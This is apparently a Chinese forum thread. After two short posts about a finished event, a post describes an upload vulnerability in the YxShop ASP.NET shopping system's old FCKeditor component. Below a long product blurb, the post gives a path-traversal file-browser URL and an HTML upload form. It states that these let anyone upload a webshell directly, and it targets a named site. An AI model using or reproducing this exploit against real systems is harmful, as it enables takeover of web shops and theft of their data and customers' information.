最近看过此主题的会员

返回列表 发帖
今年安排时间做,去年事情太多了!全部给耽误了!

TOP

活动已经顺利完成,尚有部分T恤,如有需要请联系相关人员进行沟通索取!

TOP

YxShop易想购物商城fckeditor上传漏洞
YxShop是国内首家ASP.NET免费开源商城购物系统是易想团队自主研发的基于Asp.Net+C#+SQL的B2C网上商店系统,具有开源、高速、稳定、安全等特性,可自由添加频道,只要懂得网站常识的站长就可以轻松利用易想商城购物系统源码建立起专业的大型网上书店,点卡店、鲜花店、手机店、服装店、团购网等不同类型的网络b2c商城。易想商城为您提供了一整套的在线开店解决方案,已经为国内外千家网上商店提供服务,受到了广大使用者的一致好评。YxShop技术特性:◎ 免费开源: YxShop商城是国内首款ASP.NET+Mssql2000免费开源的网上商城系统,由专业的开发团队升级维护,并为您提供及时高效的技术支持,商城不仅免费提供,而且开放所有源码,您还可以根据自己的商务特征对易想商城进行定制,增加自己商城的特色功能。 ◎ 强大便捷:YxShop商城功能非常强大,不仅有无限级分类,还可以自定义风格,拥有强大的CMS功能,还有一个重要的特点就是操作上的方便快捷。我们的设身处地为用户着想的设计理念使我们的产品达到了极高的易用性,只需轻点鼠标+简单录入即可完成商城管理。◎ 高速稳定: YxShop商城在系统架构,数据库,程序等方面的设计都由专业团队完成,保证了系统的运行效率,高效合理的管理流程助您在瞬息万变的商务活动中始终领先一步,掌握市场的主动权,易想商城还经过周密的测试,让您放心的拥有稳定可靠的系统。◎ 风格多样: 用YxShop商城可以轻松拥有仿当当网、红孩子、京东商城等国内主流商城的界面,不仅如此,YxShop还每月增加网友需要的风格,更有强大的用户群自己提供分享的界面风格,您还可以根据自己的需要只要会html就轻松编辑自己的专业的商城风格。 公布的漏洞也少,但是fckeditor的漏洞很多。这套程序用的还是比较老的版本fckeditor.可以直接上传webshell。测试如下:



http://www.sitedirsec.com/controls/fckeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.aspx 复制代码connector.aspx被删可用以下代码:



<form id=frmUpload enctype=multipart/form-data action=http://www.sitedirsec.com/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media method=post>
Upload a new file:<br>
<input type=file name=NewFile size=50><br>
<input id=btnUpload type=submit value=Upload>
</form> 复制代码把上面代码保存成test.html就可以直接上传webshell了。


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表